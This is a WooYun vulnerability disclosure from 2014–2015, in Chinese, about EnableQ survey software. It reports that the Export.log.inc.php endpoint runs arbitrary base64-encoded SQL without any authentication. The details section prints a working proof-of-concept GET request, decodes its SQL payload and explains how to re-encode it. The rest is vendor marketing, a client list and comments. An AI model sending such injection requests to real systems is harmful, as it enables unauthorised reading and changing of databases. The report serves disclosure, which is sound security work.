EnableQ全版本通杀sql注入(越权整个SQL语句注射,创建表,删除表,更新表)

漏洞概要

缺陷编号:WooYun-2014-088298

漏洞标题:EnableQ全版本通杀sql注入(越权整个SQL语句注射,创建表,删除表,更新表)

相关厂商:北京科维能动信息技术有限公司

漏洞作者:menmen519

提交时间:2014-12-23 15:18

公开时间:2015-03-23 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2014-12-23: 细节已通知厂商并且等待厂商处理中
2014-12-24: 厂商已经确认,细节仅向厂商公开
2014-12-27: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-02-17: 细节向核心白帽子及相关领域专家公开
2015-02-27: 细节向普通白帽子公开
2015-03-09: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

EnableQ全版本通杀sql注入(越权整个SQL语句注射):EnableSite是一个提供完整网站生命周期管理TM的应用软件系统。针对网站生命周期中的SPRIMTM五要素,提供了快速易用、功能强大的丰富应用功能。EnableSite能够帮助用户迅速高效的构建、实施和维护具有丰富内容类型的、关键的企业网站系统。通过面向网站内容和使用习惯的操作处理机制,EnableSite降低了系统部署的成本,同时也完善和提高了商业用户对于企业网站内容的管理和操控能力,提高了网站内容访问的质量和效率。
网站内容管理的全面解决方案EnableSite能够让商业用户随时随地的建立和发布以及管理各种复杂多样的信息内容,借助简单明了的向导程序、熟悉易用的编辑工具、灵活应用的美工标签、即选即用的内置类型、简洁方便的配置选项,您可以更随心所欲地将商业信息展现给商业客户,同时也更有效地利用对企业网站内容的迅速更新提高商业服务层次。
快速部署和较少的成本投入建立和部署基于Web方式的信息服务门户将变得比以往更快速和高效。相比较大量手工代码编写的程序实现而言,EnableSite提供了通用性极强的内置内容类型直接使用,并且更广泛的内容兼容性和对内容类型的灵活配置也对部署的速度和质量提供了进一步帮助。案例:
政府及直属事业单位公安部信息中心
公安部刑事侦查局
全国警用地理信息系统建设
国家统计局农村社会经济调查司
人力资源和社会保障部中国人事科学研究院
教育部学生体育联合会
商务部国际贸易经济合作研究院
国家环境保护总局环境标准研究所
中国国际贸易促进委员会北京市分会
国家轻工业乐器信息中心
中国延安精神研究会国际机构亚洲公共行政网络(AGPA)中央级学会协会中国制冷学会
中国黄金协会
中国人才研究会
中国工程建设焊接协会
中国环境科学学会
中国测绘学会
中国核学会
中国硅酸盐学会
中国氮肥工业协会
中国硫酸工业协会
中国冶金建设协会
中国心理卫生协会
中国力学学会
中国华侨发展基金会
中国岩石力学与工程学会
中国岩石力学与工程学会软岩工程与深部灾害控制分会
中国图书馆学会
中国气象学会
中国家用电器维修协会
中国粮食行业协会
中国国土经济学研究会
中国洗涤用品工业协会
中国稀土学会
中国建筑金属结构协会给水排水设备分会地面供暖委员会
中国节能协会
中国中西医结合学会
中国煤炭学会
中国医药保健品营销协会
中国商品学会
中国砂石协会
中国建筑学会暖通空调分会
河南省耐火材料行业协会
北京服务贸易协会
北京信息产业协会
北京医学奖励基金会教育、科研机构国家广播电视产品质量监督检验中心
中国科学院微电子研究所
中国科学院古脊椎动物与古人类研究所
中国科学院地质与地球物理研究所工程地质力学重点实验室
中国科学院植物研究所植被与环境变化国家重点实验室
中国环境科学研究院生态研究所
中国环境科学研究院
中国科学院心理研究所
中国农业科学院农业环境与可持续发展研究所
中国电影科学技术研究所
中国文物研究所
北京工业大学经济与管理学院
中国劳动关系学院继续教育学院
北京市市政工程研究院
中国国际医药保健研究院
云南瑞丽珠宝玉石饰品质量监督检验站
首都体育学院运动机能评定与技术分析北京市重点实验室
贵州黄金珠宝检测中心
北京市地质工程勘察院
北京市水文地质工程地质大队
北京志鸿教育研究中心
北京乐器研究所
北京市第七中学文化、出版徐悲鸿纪念馆
中国广播电视出版社
北京欣雅斋裱画社企业ArcSight China
北京晋煤太阳石化工有限公司
哈尔滨哈药健康产业有限公司
合力思软件(中国)有限公司
北京讯风光通信技术开发有限责任公司
北京光彩伟业商业有限公司
北京江南天安科技有限公司
北京零点市场调查与分析公司
北京零点前进策略咨询有限责任公司
北京零点指标数据有限责任公司
上海零点远景投资管理咨询有限公司
北京燕世隆商贸有限责任公司
北京方程世纪纳米材料科技有限公司
北京康普快车科技发展中心
北京世联互通网络科技有限公司
北京中食新华科技有限公司
山东世纪天鸿书业有限公司
北京中天光华科技有限公司
北京天泉绿洲科技有限公司
哪吒在线
上海格薇娜商贸有限公司
北京中科诺泰技术有限公司
北京现代龙康医药研究院有限公司
北京航丰经济技术开发公司
百合圣洁(北京)贸易发展有限公司
北京华日升吕塑门窗有限公司
北京艺编广告有限公司
北京慧华时代科技有限公司
北京长庚消防工程安装有限责任公司
北京乔宏(集团)园林绿化工程有限公司
王朔朔化妆工作室
嘉禾朝阳画廊
北京世纪畅想科技发展有限公司
北京合世科贸有限责任公司
北京源三实信息咨询有限公司
北京中雪新世纪科技发展有限公司
北京恒星时代制冷设备有限公司
北京兆利恒通科技发展有限公司
北京腾跃假日旅行社
北京紫风阳光影视文化有限公司
北京天择嘉业科技有限公司
北京润成恒信科技有限公司
北京海德行商贸有限公司
北京科希盟和创技术发展有限公司

详细说明:

GET/enableq/enableq91_php52/Export/Export.log.inc.php?ExportSQL=IFNFTEVDVCBhLiosY29uY2F0KHVzZXIoKSwnOicsZGF0YWJhc2UoKSkgYXMgYWRtaW5pc3RyYXRvcnNOYW1lIEZST00gZXFfYWRtaW5pc3RyYXRvcnNsb2cgYSwgZXFfYWRtaW5pc3RyYXRvcnMgYiBXSEVSRSBhLmFkbWluaXN0cmF0b3JzSUQ9Yi5hZG1pbmlzdHJhdG9yc0lEICBPUkRFUiBCWSBhLmFkbWluaXN0cmF0b3JzTG9nSUQgREVTQw==HTTP/1.1Host: localhostExportSQL 后面的东西是一个base64编码,解开重新构造SELECT a.*,concat(user(),':',database()) as administratorsName FROM eq_administratorslog a, eq_administrators b WHERE a.administratorsID=b.administratorsID ORDER BY a.administratorsLogID DESC然后在base64加密

删除cookie,发现这里并没有进行用户权限认证:

漏洞证明:

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-12-2416:52

厂商回复:

非常感谢。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 子非海绵宝宝 白帽子 | Rank:1220 漏洞数:113)

    前排关注大牛

  2. 2010-01-01 00:00 niliu 白帽子 | Rank:1384 漏洞数:141)

    我还以为看到了详情 - -

  3. 2010-01-01 00:00 Ztz 白帽子 | Rank:53 漏洞数:5)

    url直接放查询语句也是6

  • N/A